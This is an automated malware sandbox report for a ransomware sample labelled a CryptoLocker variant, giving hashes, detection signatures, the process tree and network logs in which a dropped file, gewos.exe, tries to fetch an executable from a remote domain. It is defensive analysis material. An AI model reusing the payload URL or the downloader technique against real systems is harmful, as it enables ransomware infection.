Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

2024-01-28...er.exe

windows7-x64

9

2024-01-28...er.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    79s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/01/2024, 04:32 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-01-28_4fd641b34a9cefac25c637d942fdabbb_cryptolocker.exe

  • Size

    58KB

  • MD5

    4fd641b34a9cefac25c637d942fdabbb

  • SHA1

    e841ed0f4f3a799d056c9ebdf3c7bb73ee326675

  • SHA256

    6043080749c24698cf20972fef7e48d43b51df1e822b548b730e2b0af6158b5c

  • SHA512

    55f17f1f0300b23f59bd07021abf42c9bc18a4ef96c36a1907361fadfaf899bbc8452af32797b27e86cc898fb3fece66568b9d76b2ac7d2a476a65e04f357b54

  • SSDEEP

    1536:btB9g/xtCSKfxLIc//Xr+/AO/kIZ3ft2nVuTKB6nggOlHdUHc:btng54SMLr+/AO/kIhfoKMHdt

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-01-28_4fd641b34a9cefac25c637d942fdabbb_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-01-28_4fd641b34a9cefac25c637d942fdabbb_cryptolocker.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Users\Admin\AppData\Local\Temp\gewos.exe
      "C:\Users\Admin\AppData\Local\Temp\gewos.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:880

Network

  • flag-us
    DNS
    nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    nasap.net
    IN A
    Response
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: nasap.net
    Cache-Control: no-cache
    Response
    HTTP/1.1 301 Moved Permanently
    Server: nginx
    Date: Sun, 28 Jan 2024 04:32:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    X-Redirect-By: WordPress
    Location: https://www.nasap.net/config/8mo.exe
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W301 NC:000000 UP:
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180deploystaticakamaitechnologiescom
  • flag-us
    DNS
    5.119.212.35.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.119.212.35.in-addr.arpa
    IN PTR
    Response
    5.119.212.35.in-addr.arpa
    IN PTR
    511921235bcgoogleusercontentcom
  • flag-us
    DNS
    www.nasap.net
    gewos.exe
    Remote address:
    8.8.8.8:53
    Request
    www.nasap.net
    IN A
    Response
    www.nasap.net
    IN CNAME
    nasap.net
    nasap.net
    IN A
    35.212.119.5
  • flag-us
    GET
    https://www.nasap.net/config/8mo.exe
    gewos.exe
    Remote address:
    35.212.119.5:443
    Request
    GET /config/8mo.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Cache-Control: no-cache
    Host: www.nasap.net
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sun, 28 Jan 2024 04:32:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Cache-Enabled: False
    Link: <https://www.nasap.net/index.php/wp-json/>; rel="https://api.w.org/"
    X-Httpd: 1
    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
    X-Proxy-Cache: MISS
    X-Proxy-Cache-Info: W NC:000000 UP:
  • flag-us
    DNS
    226.20.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    226.20.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    64.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    64.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217deploystaticakamaitechnologiescom
  • flag-us
    DNS
    114.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.110.16.96.in-addr.arpa
    IN PTR
    Response
    114.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-114deploystaticakamaitechnologiescom
  • flag-us
    DNS
    173.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    173.178.17.96.in-addr.arpa
    IN PTR
    Response
    173.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-173deploystaticakamaitechnologiescom
  • flag-us
    DNS
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 35.212.119.5:443
    https://nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    1.1kB
     5.7kB
     13
    10

    HTTP Request

    GET https://nasap.net/config/8mo.exe

    HTTP Response

    301
  • 35.212.119.5:443
    https://www.nasap.net/config/8mo.exe
    tls, http
    gewos.exe
    3.6kB
     81.3kB
     67
    64

    HTTP Request

    GET https://www.nasap.net/config/8mo.exe

    HTTP Response

    404
  • 8.8.8.8:53
    nasap.net
    dns
    gewos.exe
    55 B
     71 B
     1
    1

    DNS Request

    nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    5.119.212.35.in-addr.arpa
    dns
    71 B
     122 B
     1
    1

    DNS Request

    5.119.212.35.in-addr.arpa

  • 8.8.8.8:53
    www.nasap.net
    dns
    gewos.exe
    59 B
     89 B
     1
    1

    DNS Request

    www.nasap.net

    DNS Response

    35.212.119.5

  • 8.8.8.8:53
    226.20.18.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    226.20.18.104.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    64.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    64.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    114.110.16.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    114.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    173.178.17.96.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    173.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    23.236.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    23.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\gewos.exe
    Filesize

    59KB

    MD5

    9829dbea5d74c51c7c8fca8d68236841

    SHA1

    83b91474e64ac725524a23d77531a92e32a72261

    SHA256

    845a7e2b48555d304f3abd9e92d1201b3299a97176b2277f2d142d21b9b4392d

    SHA512

    7fe3fa845fe38d60f1960cf51c16d3e4cb3394f2a1baeb02a73e1d3991e736ce8cd44c28304d5c6448f47e17286988e852b0cb25f4ad4b2153b0e7bd6296b057

    Download Submit

  • memory/880-20-0x00000000006F0000-0x00000000006F6000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1388-0-0x0000000000740000-0x0000000000746000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1388-1-0x0000000000740000-0x0000000000746000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1388-2-0x0000000000400000-0x0000000000406000-memory.dmp

    Filesize

    24KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.